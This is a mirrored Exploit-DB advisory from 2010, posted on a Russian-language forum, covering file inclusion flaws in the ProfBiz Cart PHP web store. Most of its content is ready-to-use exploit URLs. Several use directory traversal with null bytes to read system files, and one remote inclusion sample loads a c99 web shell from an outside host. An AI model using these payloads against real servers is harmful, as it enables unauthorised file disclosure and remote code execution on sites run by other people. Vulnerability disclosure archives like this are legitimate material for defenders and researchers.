- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 11075
- Проверка EDB
-
- Пройдено
- Автор
- ZER0 THUNDER
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2010-01-09
Код:
# Author: Zer0 Thunder
# Site : http://www.profitcode.net/ - http://profbiz-cart.sourceforge.net/
# Tested on: Windows XP sp2 [WampServer 2.0i]
- There are Cople of pages that has the LFI vuln
Vuln c0de : dl-authcontent.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
$returlvar = "dloads";
include "$docroot" . "tplates/usrauthlogin.php";
exit;
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit :
http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=[LFI]
Sample :
http://server/store/dloads/dloadsmainincs/dl-authcontent.php?docroot=../../../../../boot.ini%00
***************************************************************************************************
vuln c0de : dl-maincatsearch-dlcontent.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include("$docroot" . "shopincs/catpgtop$langFile.php");
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit
http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=[LFI]
Sample
http://server/store/dloads/dloadsmainincs/dl-maincatsearch-dlcontent.php?docroot=../../../../../boot.ini%00
Vuln c0de : dloads-payed.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "tplates/usrauthlogin.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit
http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=[LFI]
Sample
http://server/store/dloads/dloadstplates/dloads-payed.php?docroot=.../../../../../../../../boot.ini%00
************************************************************************
- For Some resons this comeup with a RFI
Vuln c0de : dloads-header.php
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
include "$docroot" . "dloads/dloadsmainincs/inc-dloadsfunctions.php";
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Exploit
http://server/store/dloads/dloads-header.php?docroot=[RFI]
Sample
http://server/store/dloads/dloads-header.php?docroot=http://www.cfsm.cn/c99.txt?%00
########################################
# MSN : [email protected]
# Email : [email protected]
# Site : LKHackers.com
# Greetz : To all my friends
# Note : Proud to be a Sri Lankan
# Me : Sri Lankan Hacker
########################################
- Источник
- www.exploit-db.com